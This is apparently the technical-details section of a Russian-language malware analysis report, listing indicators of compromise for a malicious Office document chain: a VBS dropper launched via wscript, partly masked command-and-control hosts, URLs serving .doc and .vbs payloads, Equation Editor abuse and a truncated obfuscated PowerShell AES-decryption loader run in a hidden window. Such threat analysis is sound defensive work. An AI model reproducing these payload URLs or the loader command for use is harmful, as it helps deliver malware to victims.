Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\mydatinglifeissoggod.vBS"
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
- %APPDATA%\mydatinglifeissoggod.vbs
- 'tn#.wtf':80
- '10#.#75.229.144':80
- 'pa###code.dev':443
- http://tn#.wtf/Z4c
- http://10#.#75.229.144/thissystemchangingentireprocessverygreattounderstandallthingsaregoodtohear___hehavingthegreatresultsbacktothegirlshand.doc
- http://10#.#75.229.144/mydatinglifeissoggod.vbs
- 'pa###code.dev':443
- DNS ASK tn#.wtf
- DNS ASK pa###code.dev
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esMana... (со скрытым окном)